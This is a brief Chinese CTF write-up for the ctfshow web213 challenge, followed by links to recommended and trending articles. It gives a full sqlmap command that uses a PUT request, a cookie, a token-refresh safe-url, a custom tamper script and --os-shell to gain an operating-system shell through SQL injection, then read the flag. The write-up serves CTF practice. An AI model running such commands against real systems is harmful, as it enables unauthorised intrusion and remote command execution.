ctfshow-web213

爱隐身的官人2025-11-11 17:56

-os--shell参数的使用

复制代码 
python sqlmap.py -u "http://b783c400-150f-4971-b2de-45dca654b75a.challenge.ctf.show/api/index.php" --method="PUT" --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=1vrv4fg7q4uid8i1lhma043h20" --safe-url="http://b783c400-150f-4971-b2de-45dca654b75a.challenge.ctf.show/api/getToken.php" --safe-freq=1 --tamper=web212.py --os-shell

有两个地方需要进行选择:如果是PHP则直接回车默认选择。

这两个地方需要选择正确才能拿到shell。

读取flag。

相关推荐
weixin_437831656 小时前
CORS是什么
web
kali-Myon11 小时前
NewStarCTF2025-Week5-Web
java·python·安全·web安全·php·web·ctf
SwBack12 小时前
[qsctf] 雏形系统
php·web·ctf·反序列化·雏形系统·qsctf
曲幽17 小时前
Flask入门:轻松掌握API路由定义
python·flask·web·route
提笔了无痕1 天前
go web开发表单知识及表单处理详解
前端·后端·golang·web
牧码岛2 天前
Web前端之canvas实现图片融合与清晰度介绍、合并
前端·javascript·css·html·web·canvas·web前端
牧码岛2 天前
Web前端之Vue+Element打印时输入值没有及时更新dom的问题
前端·javascript·html·web·web前端
组合缺一3 天前
Spring Boot 国产化替代方案。Solon v3.7.2, v3.6.5, v3.5.9 发布(支持 LTS)
java·后端·spring·ai·web·solon·mcp
带刺的坐椅4 天前
Solon 不依赖 Java EE 是其最有价值的设计!
java·spring·web·solon·javaee
pixle05 天前
从零学习Node.js框架Koa 【六】Koa文件上传下载实现:@koa/multer 与 koa-send 深度解析
node.js·web·koa·js·全栈·服务端·文件上传下载
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03BongoCat - 跨平台键盘猫动画工具04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Linux下V2Ray安装配置指南06本地部署阿里最新开源的Z-Image07【保姆级教程】免费使用Gemini3的5种方法!免翻墙/国内直连0846个Nano-banana 精选提示词,持续更新中09Meta第三代“分割一切”模型——SAM 3本地部署教程:首支持文本提示分割,400万概念、30毫秒响应,检测分割追踪一网打尽10Labelme从安装到标注:零基础完整指南